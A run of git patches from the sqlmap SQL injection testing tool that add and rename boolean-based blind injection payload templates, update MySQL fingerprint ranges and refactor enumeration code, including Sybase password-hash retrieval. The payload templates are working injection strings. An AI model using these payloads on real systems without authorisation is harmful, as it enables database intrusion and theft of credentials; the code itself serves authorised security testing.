fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py @@ -72,7 +72,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -b744d840de253c05e808a72d6d11dc5d lib/request/connect.py +35db2a1779b9c71dfa183ac1f8995a5b lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From cd08d1364731ec01c3abb653264e23c1fa60b10f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 19 Sep 2018 11:05:55 +0200 Subject: [PATCH 291/428] Adding a generic parameter replace payload --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +- xml/payloads/boolean_blind.xml | 106 ++++++++++++--------------------- 3 files changed, 41 insertions(+), 71 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 83687a20410..330b29f0aae 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.30" +VERSION = "1.2.9.31" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 460896a280d..13662fed68b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -64ae44f8e2b61c49354f3866ba40a926 lib/core/settings.py +fa8c27b009a20b604ce2959e7f7d0696 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -474,7 +474,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -1d5d2027cabbd1c9ff317d97ae8fe92a xml/payloads/boolean_blind.xml +4db0392af190e27f9e2af56a3249c5cb xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 7b9e5b46ee1..ca09ca3c1af 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -203,6 +203,40 @@ Tag: + + AND boolean-based blind - WHERE or HAVING clause (subquery) (Generic comment) + 1 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + + + OR boolean-based blind - WHERE or HAVING clause (subquery) (Generic comment) + 1 + 2 + 3 + 1,9 + 2 + OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + [GENERIC_SQL_COMMENT] + + + OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) + + + AND boolean-based blind - WHERE or HAVING clause (Generic comment) 1 @@ -566,83 +600,19 @@ Tag: - MySQL >= 5.0 boolean-based blind - Parameter replace + Boolean-based blind - Parameter replace (original value) 1 1 1 1,2,3 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - -
    - MySQL - >= 5.0 -
    -     - - - MySQL >= 5.0 boolean-based blind - Parameter replace (original value) - 1 - 2 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - -
    - MySQL - >= 5.0 -
    -     - - - MySQL < 5.0 boolean-based blind - Parameter replace - 1 - 2 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) -
    - MySQL - < 5.0 -
    -     - - - MySQL < 5.0 boolean-based blind - Parameter replace (original value) - 1 - 3 - 1 - 1,2,3 - 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - - - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) - -
    - MySQL - < 5.0 -
    From 245c5e64e9552181bb6404876c5ed4bc47e73b82 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 19 Sep 2018 11:13:59 +0200 Subject: [PATCH 292/428] Minor cleanup --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- xml/payloads/boolean_blind.xml | 16 ++++++++-------- 3 files changed, 11 insertions(+), 11 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 330b29f0aae..275c6c1c229 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.31" +VERSION = "1.2.9.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 13662fed68b..77df22df343 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fa8c27b009a20b604ce2959e7f7d0696 lib/core/settings.py +efef2534b513cac460d62a2709dad5b5 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -474,7 +474,7 @@ d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml 3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml 6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml a279656ea3fcb85c727249b02f828383 xml/livetests.xml -4db0392af190e27f9e2af56a3249c5cb xml/payloads/boolean_blind.xml +11547289b99eaced5b55185a3230529a xml/payloads/boolean_blind.xml 0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml 82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index ca09ca3c1af..efb9e5cdcbc 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -204,7 +204,7 @@ Tag: - AND boolean-based blind - WHERE or HAVING clause (subquery) (Generic comment) + AND boolean-based blind - WHERE or HAVING clause (subquery - comment) 1 2 1 @@ -221,7 +221,7 @@ Tag: - OR boolean-based blind - WHERE or HAVING clause (subquery) (Generic comment) + OR boolean-based blind - WHERE or HAVING clause (subquery - comment) 1 2 3 @@ -238,7 +238,7 @@ Tag: - AND boolean-based blind - WHERE or HAVING clause (Generic comment) + AND boolean-based blind - WHERE or HAVING clause (comment) 1 2 1 @@ -255,7 +255,7 @@ Tag: - OR boolean-based blind - WHERE or HAVING clause (Generic comment) + OR boolean-based blind - WHERE or HAVING clause (comment) 1 2 3 @@ -272,7 +272,7 @@ Tag: - OR boolean-based blind - WHERE or HAVING clause (Generic comment) (NOT) + OR boolean-based blind - WHERE or HAVING clause (NOT - comment) 1 4 3 @@ -329,7 +329,7 @@ Tag: - OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT) + OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) 1 3 3 @@ -981,7 +981,7 @@ Tag: - Boolean-based blind - Parameter replace (DUAL) (original value) + Boolean-based blind - Parameter replace (DUAL - original value) 1 3 1 @@ -1015,7 +1015,7 @@ Tag: - Boolean-based blind - Parameter replace (CASE) (original value) + Boolean-based blind - Parameter replace (CASE - original value) 1 3 1 From a4068f9abfd028e102499a5b31c6f2cd7e8e23e3 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 20 Sep 2018 16:52:02 +0200 Subject: [PATCH 293/428] Minor update --- lib/core/settings.py | 2 +- plugins/dbms/mysql/fingerprint.py | 8 ++++---- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 275c6c1c229..b2511829db0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.32" +VERSION = "1.2.9.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 89ea5c8ee09..092d97d3dcb 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -48,11 +48,11 @@ def _commentCheck(self): (50000, 50096), # MySQL 5.0 (50100, 50172), # MySQL 5.1 (50400, 50404), # MySQL 5.4 - (50500, 50558), # MySQL 5.5 - (50600, 50638), # MySQL 5.6 - (50700, 50720), # MySQL 5.7 + (50500, 50564), # MySQL 5.5 + (50600, 50644), # MySQL 5.6 + (50700, 50726), # MySQL 5.7 (60000, 60014), # MySQL 6.0 - (80000, 80003), # MySQL 8.0 + (80000, 80015), # MySQL 8.0 ) index = -1 diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 77df22df343..7e54375c3fb 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -efef2534b513cac460d62a2709dad5b5 lib/core/settings.py +85acbc0a45352eeb4ebe78dbef74918b lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -173,7 +173,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 34216d44fe66ffc8c5b4a0714839cf9f plugins/dbms/mysql/filesystem.py -34d951003dca386719c4d91384d2669a plugins/dbms/mysql/fingerprint.py +1c0175476b833a1b788550726be67c99 plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py 403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py From 721046831b83f38e7fc05c1ae08abfe425cdd629 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 21 Sep 2018 22:15:29 +0200 Subject: [PATCH 294/428] Minor patch --- lib/core/settings.py | 2 +- lib/utils/pivotdumptable.py | 7 ++++--- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b2511829db0..c54d6687962 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.33" +VERSION = "1.2.9.34" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index 231214cae86..0ced0b62cea 100644 --- a/lib/utils/pivotdumptable.py +++ b/lib/utils/pivotdumptable.py @@ -11,6 +11,7 @@ from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue @@ -174,10 +175,10 @@ def _(column, pivotValue): warnMsg += "will display partial output" logger.warn(warnMsg) - except SqlmapConnectionException, e: - errMsg = "connection exception detected. sqlmap " + except SqlmapConnectionException, ex: + errMsg = "connection exception detected ('%s'). sqlmap " % getSafeExString(ex) errMsg += "will display partial output" - errMsg += "'%s'" % e + logger.critical(errMsg) return entries, lengths diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7e54375c3fb..6cb89c704d4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -85acbc0a45352eeb4ebe78dbef74918b lib/core/settings.py +de9fa04f019f5d14db8589e1a61b3064 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 248bd121e0565318e1efaff54aa427bc lib/core/target.py @@ -112,7 +112,7 @@ f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py d0f4d56c5d6a09a4635035e233d4a782 lib/utils/hash.py 011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py 1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py -010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py +b0105f091c2e919c3cdb549cb29fd194 lib/utils/pivotdumptable.py 683c3bd05b6164f56a57ed495c162684 lib/utils/progress.py 0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py 2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py From e69735476515c0af4009b61e849b3d79581c1133 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 21 Sep 2018 23:06:45 +0200 Subject: [PATCH 295/428] Fixing non-resumal of MsSQL/Sybase/MaxDB enumeration queries --- lib/core/option.py | 1 + lib/core/settings.py | 2 +- lib/core/target.py | 8 ++++++++ lib/utils/pivotdumptable.py | 6 +++--- plugins/dbms/maxdb/enumeration.py | 11 ++++------- plugins/dbms/sybase/enumeration.py | 14 +++++--------- plugins/generic/users.py | 10 ++++------ txt/checksum.md5 | 14 +++++++------- 8 files changed, 33 insertions(+), 33 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 5bd75098740..d033ffdeb10 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1713,6 +1713,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.absFilePaths = set() kb.adjustTimeDelay = None kb.alerted = False + kb.aliasName = randomStr() kb.alwaysRefresh = None kb.arch = None kb.authHeader = None diff --git a/lib/core/settings.py b/lib/core/settings.py index c54d6687962..5b589fd7e76 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.34" +VERSION = "1.2.9.35" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 4653cb6b027..cb3f755a621 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -692,6 +692,13 @@ def _createTargetDirs(): _createFilesDir() _configureDumper() +def _setAuxOptions(): + """ + Setup auxiliary (host-dependent) options + """ + + kb.aliasName = randomStr(seed=hash(conf.hostname or "")) + def _restoreMergedOptions(): """ Restore merged options (command line, configuration file and default values) @@ -745,3 +752,4 @@ def setupTargetEnv(): _resumeHashDBValues() _setResultsFile() _setAuthCred() + _setAuxOptions() \ No newline at end of file diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py index 0ced0b62cea..03e2226a8c5 100644 --- a/lib/utils/pivotdumptable.py +++ b/lib/utils/pivotdumptable.py @@ -32,7 +32,7 @@ from lib.core.unescaper import unescaper from lib.request import inject -def pivotDumpTable(table, colList, count=None, blind=True): +def pivotDumpTable(table, colList, count=None, blind=True, alias=None): lengths = {} entries = {} @@ -89,7 +89,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): if not validPivotValue: for column in colList: infoMsg = "fetching number of distinct " - infoMsg += "values for column '%s'" % column + infoMsg += "values for column '%s'" % column.replace(("%s." % alias) if alias else "", "") logger.info(infoMsg) query = dumpNode.count2 % (column, table) @@ -100,7 +100,7 @@ def pivotDumpTable(table, colList, count=None, blind=True): validColumnList = True if value == count: - infoMsg = "using column '%s' as a pivot " % column + infoMsg = "using column '%s' as a pivot " % column.replace(("%s." % alias) if alias else "", "") infoMsg += "for retrieving row data" logger.info(infoMsg) diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index c0442f7be3e..16f3e1068b7 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -43,9 +43,8 @@ def getDbs(self): logger.info(infoMsg) rootQuery = queries[DBMS.MAXDB].dbs - randStr = randomStr() query = rootQuery.inband.query - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.schemaname' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.schemaname' % kb.aliasName], blind=True) if retVal: kb.data.cachedDbs = retVal[0].values()[0] @@ -79,9 +78,8 @@ def getTables(self, bruteForce=None): rootQuery = queries[DBMS.MAXDB].tables for db in dbs: - randStr = randomStr() query = rootQuery.inband.query % (("'%s'" % db) if db != "USER" else 'USER') - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.tablename' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.tablename' % kb.aliasName], blind=True) if retVal: for table in retVal[0].values()[0]: @@ -202,15 +200,14 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) - randStr = randomStr() query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), ("'%s'" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != "USER" else 'USER') - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.columnname' % randStr, '%s.datatype' % randStr, '%s.len' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.columnname' % kb.aliasName, '%s.datatype' % kb.aliasName, '%s.len' % kb.aliasName], blind=True) if retVal: table = {} columns = {} - for columnname, datatype, length in zip(retVal[0]["%s.columnname" % randStr], retVal[0]["%s.datatype" % randStr], retVal[0]["%s.len" % randStr]): + for columnname, datatype, length in zip(retVal[0]["%s.columnname" % kb.aliasName], retVal[0]["%s.datatype" % kb.aliasName], retVal[0]["%s.len" % kb.aliasName]): columns[safeSQLIdentificatorNaming(columnname)] = "%s(%s)" % (datatype, length) table[tbl] = columns diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index 2432598b75c..a1febb716ee 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -38,7 +38,6 @@ def getUsers(self): rootQuery = queries[DBMS.SYBASE].users - randStr = randomStr() query = rootQuery.inband.query if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -47,7 +46,7 @@ def getUsers(self): blinds = (True,) for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: kb.data.cachedUsers = retVal[0].values()[0] @@ -94,7 +93,6 @@ def getDbs(self): logger.info(infoMsg) rootQuery = queries[DBMS.SYBASE].dbs - randStr = randomStr() query = rootQuery.inband.query if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -103,7 +101,7 @@ def getDbs(self): blinds = [True] for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: kb.data.cachedDbs = retVal[0].values()[0] @@ -146,9 +144,8 @@ def getTables(self, bruteForce=None): for db in dbs: for blind in blinds: - randStr = randomStr() query = rootQuery.inband.query % db - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: for table in retVal[0].values()[0]: @@ -278,15 +275,14 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod logger.info(infoMsg) for blind in blinds: - randStr = randomStr() query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.usertype' % randStr], blind=blind) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.usertype' % kb.aliasName], blind=blind, alias=kb.aliasName) if retVal: table = {} columns = {} - for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.usertype" % randStr])): + for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.usertype" % kb.aliasName])): columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_) table[safeSQLIdentificatorNaming(tbl)] = columns diff --git a/plugins/generic/users.py b/plugins/generic/users.py index 45ac345752c..9ff861908bb 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -187,13 +187,12 @@ def getPasswordHashes(self): query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) if Backend.isDbms(DBMS.SYBASE): - randStr = randomStr() getCurrentThreadData().disableStdOut = True - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=False) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): + for user, password in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: @@ -228,13 +227,12 @@ def getPasswordHashes(self): if Backend.isDbms(DBMS.SYBASE): getCurrentThreadData().disableStdOut = True - randStr = randomStr() query = rootQuery.inband.query - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=True) + retVal = pivotDumpTable("(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=True) if retVal: - for user, password in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): + for user, password in filterPairValues(zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): password = "0x%s" % hexencode(password, conf.encoding).upper() if user not in kb.data.cachedUsersPasswords: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 6cb89c704d4..ac59b80db0e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -43,17 +43,17 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -c59c0bfccf3e906564d82adf1fcd17de lib/core/option.py +2f2b2286f82028cf36ace9be3af06bf9 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py 